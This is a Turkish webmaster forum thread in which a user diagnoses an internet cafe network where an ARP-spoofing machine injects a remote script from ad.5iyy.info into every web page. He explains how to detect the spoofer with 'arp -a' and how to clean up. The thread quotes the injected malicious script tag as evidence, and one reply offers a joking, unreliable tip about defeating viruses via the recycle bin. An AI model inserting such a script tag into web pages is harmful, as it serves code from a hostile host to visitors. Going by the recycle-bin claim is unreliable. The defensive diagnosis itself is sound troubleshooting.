İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Silinemeyen Virus/Trojan 5iyy.info - v.freefl.info - xxx.cn

Loi

0
İyinet Üyesi
Katılım
13 Kasım 2006
Mesajlar
6,192
Reaction score
44
Konum
localhost
Merhaba Arkadaşlar,
Az once bir arkadaşımın internet kafesindeki çözülemeyen problemi anlamak için geldim.

Sıkıntı şu;
Bu internet ağını kullanırken girmek istediğiniz tüm sitelerin kaynak kodları içerisinde aşağıdaki gibi kodlar bulunuyor ve interenet hızı muazzam şekilde yavaşlıyor.

Kod:
<script language="javascript" SRC="http://ad.5iyy.info/day.js"></script>

Bu şekilde sorun yaşayıp bilgisayarına format atmak isteyenler varsa hiç boşuna format felan atmayı düşünmesin çünkü format atmak çözüm değil. Eğer sisteminizde sağlam bir anti virus varsa içiniz rahat olsun, çünkü virus sizin bilgisayarınızda olmayabilir.

Virus aslında networkdeki bilgisayarlardan birinde bulunuyor ve bu bilgisayar internet ağının getwayinin(modem-router artik ne ise) mac adresini manipule ediyor.

Yani,
GETWAY IP numaranız 10.0.0.2 ise ve mac adresi 00-04-61-a1-24-0a ise.
Networkdeki bilgisayarlardan biri kendi MAC adresini size "00-04-61-a1-24-0a" miş gibi tanıtıyor ve sizin internet trafiğinizi kendisi üzerinden taşımaya başlıyor. Girmiş olduğunuz bir sitede 80 portundan taşınan tüm kaynak kodlarının üstünede kendi java script kodunu ekleyerek size veriyor.


Yapmanız gereken tam olarak komut satırına düşüp(Başlat>Çalıştır>CMD)
ARP -a yazarak aynı mac adresine sahip IP numaralarını tespit etmek. Bu komutu uyguladığınızda karşınıza aşağıdaki gibi ARP tablosu listelenecektir.

Kod:
C:\Documents and Settings\XXX>arp -a

Arabirim: 10.0.0.5 --- 0x2
  Internet Adresi       Fiziksel Adres        Tipi
  10.0.0.2              00-04-61-a1-24-0a     dinamik
  10.0.0.7              00-11-09-32-b4-5e     dinamik
  10.0.0.101            00-04-61-a1-24-0a     dinamik
  10.0.0.119            00-04-61-a3-ac-5d     dinamik

Gördüğünüz gibi listede aynı mac(fiziksel makina) adresine sahip 2 IP adresi bulunmakta. 10.0.0.2 numaralı IP adresi bizim modemimizin gerçek IP si olduğuna göre, modemi taklit eden bilgisayar 10.0.0.101 numaralı bilgisayarmış. Şimdi yapmanız gereken bu bilgisayarı tespit edip network kablosunu çekmek daha sonra temiz şekilde bir windows kurmak olacaktır. Bu arada kendi bilgisayarınızdaki komut satırına ARP -d yazarak ARP tablosunu temizlemenizde doğru bir davranış olacaktır.


Hepinize güneşli günler ve bol kazançlar dilerim.
 

gf8

0
İyinet Üyesi
Onaylı Üye
Katılım
28 Ocak 2008
Mesajlar
1,686
Reaction score
2
güzel bilgiler teşekkürler
 

gf8

0
İyinet Üyesi
Onaylı Üye
Katılım
28 Ocak 2008
Mesajlar
1,686
Reaction score
2
Küçük bir taktikte ben vericem..

Bazı virüsleri sildiğinizde 1 tane silersiniz onun için 10 tane çoğalir :D

bunun için yapmanız gereken virüsü silmeyin :)

virüsü bulup dosya üzerine sağ tıklayıp kes diyin ve geri dönüşüm kutusuna gönderin ordan silin geri dönüşüm kutusundan sildiğinizde çoğalamiyor :D

( Şahsen denenmiştir ) :D
 

Loi

0
İyinet Üyesi
Katılım
13 Kasım 2006
Mesajlar
6,192
Reaction score
44
Konum
localhost
Hangi virusun oldugunu soylemen daha dogru olur. Ayrica adam gibi yazilmis bir virusten keserek veya silerek kurtulmaya çalışmak zaten pek akıl kârıda değil. Önce virusu tanımak ve sistemde olan virusu tekrar ortaya cikarabilecek uygulama dosyalarını bulmak gerekir. Ayrıca aktif calışan uygulamalar varsa bunların tek seferde KILL lenmesi gerekir daha sonra tespit edilen adreslerden exeler(calistirilabilir baska uygulamalar) silinmeli ve son olarakta sistemi restart ettigimizde kendisini tekrar baslatamamasini saglamak icin ilgili yerler (registry altindaki run-runonce girdileri - startup listeleri) kontrol edilmeli.

Konu sapsin istemiyorum, acmis oldugum konu bir cok forumda ve security sitesinde hala çözüme kavuşmamış şekilde duruyor. Eğer diğer forum ve security sitelerine üye olanlar varsa konuyu kaynak belirterek yayımlayabilirler. Doğrusu virus beni çok etkiledi, çok kurnazca yazılmış bişey. Kendisini sildirmeden bu şekilde yaymaya devam etmesi gerçekten çok kolay olacaktır.
 

gf8

0
İyinet Üyesi
Onaylı Üye
Katılım
28 Ocak 2008
Mesajlar
1,686
Reaction score
2
bahsettiğim sadece silerken çoğalanlar için..
 

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5

Üst